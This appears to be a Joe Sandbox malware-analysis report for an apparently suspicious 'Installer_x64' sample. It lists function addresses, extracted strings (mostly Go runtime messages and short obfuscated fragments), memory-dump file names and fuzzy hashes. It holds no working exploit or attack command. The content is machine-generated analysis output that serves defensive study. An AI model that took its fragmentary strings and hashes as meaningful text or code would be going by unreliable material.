String ID: $ $ $$$$$&$&$'$($($*$+$,$,$.$/$/$0$0$1$1$2$4$6$8$:$<$>
API String ID: 0-539718436
Opcode ID: ce77e2acbc068e3f73e8720a49786ab0727579232b72c2031942efc2cccb0b23
Instruction ID: 00e9bcabab149b7896a19d800415240d68df633fe8aff387de4058a4ec764d79
Opcode Fuzzy Hash: ce77e2acbc068e3f73e8720a49786ab0727579232b72c2031942efc2cccb0b23
Instruction Fuzzy Hash: BA712560108BC28EDB26CF3C88D864A7E902B67224F5897DCD9E54F3DBD3A5C146C766

Function 0BCB30F4 Relevance: 35.1, Strings: 28, Instructions: 147COMMON

Download Yara Rule

Strings

, xrefs: 0BCB3117
8, xrefs: 0BCB3177
0, xrefs: 0BCB32E0
+, xrefs: 0BCB31C3
,, xrefs: 0BCB3203
/, xrefs: 0BCB31F3
&, xrefs: 0BCB31AB
&, xrefs: 0BCB311F
1, xrefs: 0BCB320B
,, xrefs: 0BCB3147
(, xrefs: 0BCB31CB
4, xrefs: 0BCB3167
6, xrefs: 0BCB315F
2, xrefs: 0BCB314F
', xrefs: 0BCB31EB
/, xrefs: 0BCB31FB
$, xrefs: 0BCB31E3
<, xrefs: 0BCB3187
., xrefs: 0BCB313F
0, xrefs: 0BCB3157
>, xrefs: 0BCB317F
1, xrefs: 0BCB3193
:, xrefs: 0BCB316F
, xrefs: 0BCB31D3
$, xrefs: 0BCB3127
*, xrefs: 0BCB312F
(, xrefs: 0BCB3137
, xrefs: 0BCB31BB

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: $ $ $$$$$&$&$'$($($*$+$,$,$.$/$/$0$0$1$1$2$4$6$8$:$<$>
API String ID: 0-539718436
Opcode ID: 27aef89e738d6db16f455bf0dcb93a7228f1fcb7f48197c52414bafd17e4ad59
Instruction ID: 8a1be3f35e0a570d741a3c355d1dc802a30c584fcb1a167d12be3ddfed266025
Opcode Fuzzy Hash: 27aef89e738d6db16f455bf0dcb93a7228f1fcb7f48197c52414bafd17e4ad59
Instruction Fuzzy Hash: AF813660108BC28EDB26CF3C88D864A7E902B67224F5887DCD8E54F3DBD3A5D146C366

Function 00C7A7D0 Relevance: 12.7, Strings: 10, Instructions: 172COMMON

Download Yara Rule

Strings

CreateWaitableTimerEx when creating timer failedInt.GobDecode: encoding version %d not supportedMajorSubsystemVersion is outside 3<-->6 boundaryNumber of heap bytes allocated and still in use.Out-Of-Bounds Level: '%d', defaulting to NoLevelSecond method return, xrefs: 00C7AA90
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00C7AA01
runtime: g0 stack [runtime: heapInUse=runtime: pcdata is runtime: preempt g0runtime: totalFree=runtime\.call[0-9]*sampling period=%dsemaRoot rotateLeftskip this directoryslice_not_have_elemstopm holding locksstring_is_file_pathstring_is_longitudestring_is_mul, xrefs: 00C7A96B
bad g0 stackbad recoverycaller errorcan't happencas64 failedchan receiveclose notifycomctl32.dllcomdlg32.dllcontent-typecontext.TODOdirlist.htmldouble_valuedumping heapend tracegcentersyscallexact_one_ofexit status freeaddrinfogcBitsArenasgc_sys_bytesgcpacert, xrefs: 00C7A9DA
VirtualQuery for stack base failed" is anonymous but has PkgPath set^[a-zA-Z0-9!#$%&'*+/=?^_`{|}~.-]+$__gnu_cxx::new_allocator::allocateadding nil Certificate to CertPoolargon2: number of rounds too smallargon2: parallelism degree too lowbad tag in lazy extens, xrefs: 00C7AA35
runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=totalAlloc and consistent stats are not equaltransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00C7AAB7
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=totalAlloc and consistent stats are not equaltransform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another, xrefs: 00C7AA5C
)***.*/*=+++-+=, ,---=->.../.\///=/i00010X0b0o0s0x253132333536395380: :=:]; <!<-<<<=<><?=#==="=~> >=>>?>??A3A4ADAEAFAGAIALAMAOAQARASATAUAWAXAZBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBSBTBVBWBYBZCACCCDCFCGCHCICKCLCMCNCOCRCUCVCWCXCYCZCcCfCoCsDEDJDKDMDODZECEEEGEHERESETF1, xrefs: 00C7A9BF
%, xrefs: 00C7AAF4
runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowtimestamp (%v) has out-of-range nanost, xrefs: 00C7AAEB

Memory Dump Source

Source File: 00000000.00000002.2333607539.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2333592998.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333986045.0000000001155000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334423727.00000000016F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334440523.00000000016F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334458028.00000000016FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334531070.000000000172A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334546110.000000000172E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334558493.000000000172F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334577381.0000000001731000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334672344.0000000001733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334714454.0000000001735000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001736000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001740000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001745000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001765000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334847424.0000000001768000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334862247.0000000001769000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_Installer_x64.jbxd

Similarity

API ID:
String ID: %$)***.*/*=+++-+=, ,---=->.../.\///=/i00010X0b0o0s0x253132333536395380: :=:]; <!<-<<<=<><?=#==="=~> >=>>?>??A3A4ADAEAFAGAIALAMAOAQARASATAUAWAXAZBABBBDBEBFBGBHBIBJBLBMBNBOBQBRBSBTBVBWBYBZCACCCDCFCGCHCICKCLCMCNCOCRCUCVCWCXCYCZCcCfCoCsDEDJDKDMDODZECEEEGEHERESETF1$CreateWaitableTimerEx when creating timer failedInt.GobDecode: encoding version %d not supportedMajorSubsystemVersion is outside 3<-->6 boundaryNumber of heap bytes allocated and still in use.Out-Of-Bounds Level: '%d', defaulting to NoLevelSecond method return$VirtualQuery for stack base failed" is anonymous but has PkgPath set^[a-zA-Z0-9!#$%&'*+/=?^_`{|}~.-]+$__gnu_cxx::new_allocator::allocateadding nil Certificate to CertPoolargon2: number of rounds too smallargon2: parallelism degree too lowbad tag in lazy extens$bad g0 stackbad recoverycaller errorcan't happencas64 failedchan receiveclose notifycomctl32.dllcomdlg32.dllcontent-typecontext.TODOdirlist.htmldouble_valuedumping heapend tracegcentersyscallexact_one_ofexit status freeaddrinfogcBitsArenasgc_sys_bytesgcpacert$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=totalAlloc and consistent stats are not equaltransform: input and output are not identicaltransitioning GC to the same state $runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowtimestamp (%v) has out-of-range nanost$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=totalAlloc and consistent stats are not equaltransform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: heapInUse=runtime: pcdata is runtime: preempt g0runtime: totalFree=runtime\.call[0-9]*sampling period=%dsemaRoot rotateLeftskip this directoryslice_not_have_elemstopm holding locksstring_is_file_pathstring_is_longitudestring_is_mul
API String ID: 0-3684848593
Opcode ID: afd9ec393fa906a7808113309dbf8eb74ef855a546a07f9c0afb26119d334abe
Instruction ID: 446fb06ab9bc64096bb3ed3c19e72d4c32672f97266655d33b67c34f1ae4d0fe
Opcode Fuzzy Hash: afd9ec393fa906a7808113309dbf8eb74ef855a546a07f9c0afb26119d334abe
Instruction Fuzzy Hash: 4681CBB45093018FD350EF64D199B5EBBE4BF88748F00892CF49887382E779D949EB62

Function 0BCB2B8B Relevance: 12.6, Strings: 10, Instructions: 130COMMON

Download Yara Rule

Strings

$, xrefs: 0BCB2BE3
*, xrefs: 0BCB2BAB
4, xrefs: 0BCB2BA3
,, xrefs: 0BCB2BC3
", xrefs: 0BCB2BCB
0, xrefs: 0BCB2B67
&, xrefs: 0BCB2BDB
, xrefs: 0BCB2BD3
., xrefs: 0BCB2BBB
(, xrefs: 0BCB2BB3

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: $"$$$&$($*$,$.$0$4
API String ID: 0-1821538805
Opcode ID: 7b13deed305c87fc2b04df9d4239606c8ae78b764dff23f3c53b1fa4f4ce83bc
Instruction ID: 70dc36b9437d8373c6343af5500b8bb27e56964790f5e24c173a34a0b93a71b1
Opcode Fuzzy Hash: 7b13deed305c87fc2b04df9d4239606c8ae78b764dff23f3c53b1fa4f4ce83bc
Instruction Fuzzy Hash: E8516D71108B818FD725CF2CC49471ABFE1AF56220F188A9CD4AA8F3D7D7759506CB62

Function 0BCB461F Relevance: 11.3, Strings: 9, Instructions: 71COMMON

Download Yara Rule

Strings

", xrefs: 0BCB4658
*, xrefs: 0BCB4638
4, xrefs: 0BCB4630
$, xrefs: 0BCB4670
&, xrefs: 0BCB4668
,, xrefs: 0BCB4650
, xrefs: 0BCB4660
., xrefs: 0BCB4648
(, xrefs: 0BCB4640

Memory Dump Source

Source File: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: $"$$$&$($*$,$.$4
API String ID: 0-3937223387
Opcode ID: 9de7932eced57c3c1adebba03e99e17fd78b43b8b655e96d4f4faeeafe80a59c
Instruction ID: 0205d5d5321c0d0efdf0a269d67857ab37097a803df403f0fe29dc826bd087f3
Opcode Fuzzy Hash: 9de7932eced57c3c1adebba03e99e17fd78b43b8b655e96d4f4faeeafe80a59c
Instruction Fuzzy Hash: C531A5601087818EDB16CF3C949874ABFE06B56224F09CA8CD8E94F3DBD375D50AC7A6

Function 0BC97C93 Relevance: 8.8, Strings: 7, Instructions: 49COMMON

Download Yara Rule

Strings

LVHU, xrefs: 0BC97CA7
a\]H, xrefs: 0BC97CE9
quG\, xrefs: 0BC97CBD
up{~, xrefs: 0BC97D3C
DOkP, xrefs: 0BC97CC8
XlZ@, xrefs: 0BC97CD3
ZGYY, xrefs: 0BC97CDE

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: DOkP$LVHU$XlZ@$ZGYY$a\]H$quG\$up{~
API String ID: 0-2966641490
Opcode ID: 79f09f6a80d882583d75233e1b2f2626c789699b09c76a8012069eefeb3cc295
Instruction ID: 62f3da642a0898433d056bb65e78ef3298f467f38e83667eee5f7f97f2231649
Opcode Fuzzy Hash: 79f09f6a80d882583d75233e1b2f2626c789699b09c76a8012069eefeb3cc295
Instruction Fuzzy Hash: 011157B14293C08BD3318F2498A53DFBBE2ABD1315F0A492CC4DC8F351DB3546068B46

Function 0BCA9ADC Relevance: 8.8, Strings: 7, Instructions: 37COMMON

Download Yara Rule

Strings

wOL|, xrefs: 0BCA9B08
&HRd, xrefs: 0BCA9AEC
*)tv, xrefs: 0BCA9B01
aWZm, xrefs: 0BCA9AFA
*)tv, xrefs: 0BCA9B77
kS,C, xrefs: 0BCA9AF3
.O@D, xrefs: 0BCA9B0F

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: &HRd$*)tv$*)tv$.O@D$aWZm$kS,C$wOL|
API String ID: 0-1941348422
Opcode ID: d13979585473279d00609501f2bb872175464995887bc956e7b31b0a29c8d02a
Instruction ID: 9eef3f80837b946ef499cd8e6b4b3fe677b18dfe4b2bd3205973046f4011dcba
Opcode Fuzzy Hash: d13979585473279d00609501f2bb872175464995887bc956e7b31b0a29c8d02a
Instruction Fuzzy Hash: D91157B4A102438BD719CF55C0917AAFBB1FB04310F2992A8C4446F686D738D9C2CFD1

Function 0BC8B1D0 Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

IK, xrefs: 0BC8B2BF
8m5o, xrefs: 0BC8B272
_O, xrefs: 0BC8B3D2
)y*{, xrefs: 0BC8B241
1Y:[, xrefs: 0BC8B293

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: )y*{$1Y:[$8m5o$_O$IK
API String ID: 0-1390131777
Opcode ID: 3d763becbe6102e57698c8484acdbf217ee4e9892f3b7e290c07da42a0110934
Instruction ID: 4b7cea07de1722daa726e48972908bf6760fcef4aca10682bffd911428bf2ecb
Opcode Fuzzy Hash: 3d763becbe6102e57698c8484acdbf217ee4e9892f3b7e290c07da42a0110934
Instruction Fuzzy Hash: 80512FB41193849BE334AF11E982B9BBAE2BBC1740F608E1CD6D91B344DB708405CF97

Function 0BC9D860 Relevance: 6.4, Strings: 5, Instructions: 114COMMON

Download Yara Rule

Strings

Z, xrefs: 0BC9D904
^_XY, xrefs: 0BC9D8DA, 0BC9D8E0
^_XY, xrefs: 0BC9D98B, 0BC9D993
^_XY, xrefs: 0BC9D986, 0BC9D975
Z, xrefs: 0BC9D895

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: Z$Z$^_XY$^_XY$^_XY
API String ID: 0-714811695
Opcode ID: 37b690c77a9ad2365562f6458a46fe7afa2038976057741f23c68bfdf975bd85
Instruction ID: 4e10bfce64c8a60b1671c31a0c2af0497fd26b3c23b1cbae9201ca6bb42aa15b
Opcode Fuzzy Hash: 37b690c77a9ad2365562f6458a46fe7afa2038976057741f23c68bfdf975bd85
Instruction Fuzzy Hash: DC413B3011C3809AE714AF28DC2AB2BBBE1EF91724F14896CF0E69B3D1D77585068757

Function 0BC89BDF Relevance: 6.3, Strings: 5, Instructions: 63COMMON

Download Yara Rule

Strings

20, xrefs: 0BC89C74
><, xrefs: 0BC89C7B
zx, xrefs: 0BC89C12
:8, xrefs: 0BC89C82
NL, xrefs: 0BC89C5F

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: 20$:8$><$NL$zx
API String ID: 0-325453607
Opcode ID: d9054cb6f7da56c3d60bff1c54f33379ca6a608f3b842f64c144e88294f196b4
Instruction ID: 4009000719074f2a752aef59d872306dc7e9158304a6ee84c5e97c675759e086
Opcode Fuzzy Hash: d9054cb6f7da56c3d60bff1c54f33379ca6a608f3b842f64c144e88294f196b4
Instruction Fuzzy Hash: B731CCB0600B908FDB328F9AC592267BBF0BB05710B608E1CC4969BB15C3B5E512CF5A

Function 00C8B400 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

p->status= s.nelems= schedtick= span.list= timerslen=# Sys = %d%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/debug/vars/dev/stderr/dev/stdout/index.html0123456789_0x[0-9a-f]+30517578125: frame.sp=; Max-Age=0> in space AfghanistanAlign1B, xrefs: 00C8B507
releasep: invalid argruntime: confused by runtime: mappedReady=runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: totalMapped=runtime: work.nwait= sequence tag mismatchset bit is not 0 or 1stale NFS file handlestartlockedm: m has pstartm: , xrefs: 00C8B551
releasep: m=ruby_packageruntime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferslice_sortedslice_uniquesource cyclespanSetSpinesrc/runtime/status code stop tracingstring_is_ipstring_matchstring_valuestringlengthsweepWaitersswift_prefixtcmalloc::.*threadcr, xrefs: 00C8B499
m->p= max= min= next= null p->m= prev= span=#%#x$%s$%s% util%%%02x%d %s%q%x%x%q: %s%s/%s %s:%v %v: %v' for (...)(root), i = , not , val .local.onion.proto.reloc390625<-chanAacuteAcceptAgraveAngolaAnswerArabicAtildeAugustBasic BelizeBhutanBitBltBrahmiBr, xrefs: 00C8B4BB

Memory Dump Source

Source File: 00000000.00000002.2333607539.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2333592998.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333986045.0000000001155000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334423727.00000000016F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334440523.00000000016F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334458028.00000000016FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334531070.000000000172A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334546110.000000000172E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334558493.000000000172F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334577381.0000000001731000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334672344.0000000001733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334714454.0000000001735000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001736000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001740000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001745000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334729362.0000000001765000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334847424.0000000001768000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2334862247.0000000001769000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_Installer_x64.jbxd

Similarity

API ID:
String ID: m->p= max= min= next= null p->m= prev= span=#%#x$%s$%s% util%%%02x%d %s%q%x%x%q: %s%s/%s %s:%v %v: %v' for (...)(root), i = , not , val .local.onion.proto.reloc390625<-chanAacuteAcceptAgraveAngolaAnswerArabicAtildeAugustBasic BelizeBhutanBitBltBrahmiBr$ p->status= s.nelems= schedtick= span.list= timerslen=# Sys = %d%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/debug/vars/dev/stderr/dev/stdout/index.html0123456789_0x[0-9a-f]+30517578125: frame.sp=; Max-Age=0> in space AfghanistanAlign1B$releasep: invalid argruntime: confused by runtime: mappedReady=runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: totalMapped=runtime: work.nwait= sequence tag mismatchset bit is not 0 or 1stale NFS file handlestartlockedm: m has pstartm: $releasep: m=ruby_packageruntime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferslice_sortedslice_uniquesource cyclespanSetSpinesrc/runtime/status code stop tracingstring_is_ipstring_matchstring_valuestringlengthsweepWaitersswift_prefixtcmalloc::.*threadcr
API String ID: 0-3838932385
Opcode ID: 27c347816029766a395e8afcc5d83e798d0743abaf4e9de92a1d97d897092028
Instruction ID: 758d9c24c2ed31fcadb184d6210fdaf92575f7e7ffc80441d259bcb1e3f76b48
Opcode Fuzzy Hash: 27c347816029766a395e8afcc5d83e798d0743abaf4e9de92a1d97d897092028
Instruction Fuzzy Hash: 4C31FFB45083058FC310FF24D199B6ABBE0BF88318F11896DE89887752D775D988EB66

Function 0BCA1372 Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

@(B, xrefs: 0BCA1421
Y, xrefs: 0BCA1398
^, xrefs: 0BCA13A2
Y, xrefs: 0BCA138E

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: @(B$Y$Y$^
API String ID: 0-1503940739
Opcode ID: 8e5844faef86ca3b987609987c3631930d6245293f133a4970b5b02dc575c592
Instruction ID: 2b40fb7823a477ce412ec7e71a2e1883a8a3486019b30246e7b807b1e8ba3733
